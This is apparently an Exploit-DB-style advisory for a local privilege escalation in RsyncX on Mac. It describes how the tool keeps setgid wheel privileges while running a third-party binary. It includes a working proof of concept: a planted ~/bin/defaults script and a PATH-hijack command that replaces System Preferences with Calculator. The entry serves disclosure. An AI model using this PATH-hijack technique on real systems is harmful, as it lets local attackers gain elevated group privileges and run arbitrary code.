RsyncX Local Privilege Escalation Vulnerability

vendor:

RsyncX

by:

Unknown

7.5

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: RsyncX

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Mac

Unknown

RsyncX Local Privilege Escalation Vulnerability

RsyncX is installed setuid root and setgid wheel. It fails to drop setgid wheel privileges before executing a third party binary, allowing a local attacker to execute arbitrary code with group wheel privileges.

Mitigation:

There is no known mitigation for this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11211/info

It is reported that RsyncX is prone to a local privilege escalation vulnerability.

RsyncX is installed setuid root and setgid wheel. It is reported that RsyncX drops root privileges properly but fails to drop setgid wheel privileges before executing a third party binary. 

A local attacker may exploit this vulnerability to execute arbitrary code with group wheel privileges.

The following example is available:

First, make a backup of System\ Preferences.app

Create an executable file ~/bin/defaults with contents of:

=============================
#!/bin/sh
mv "/Applications/System Preferences.app/Contents" "/Applications/System Preferences.app/oldcont"
cp -r "/Applications/Calculator.app/Contents" "/Applications/System Preferences.app/Contents"
=============================

Then run RsyncX with ~/bin in your path:

PATH=~/bin:$PATH /Applications/Utilities/RsyncX.app/Contents/MacOS/RsyncX

Click on System Preferences, and is now a calculator.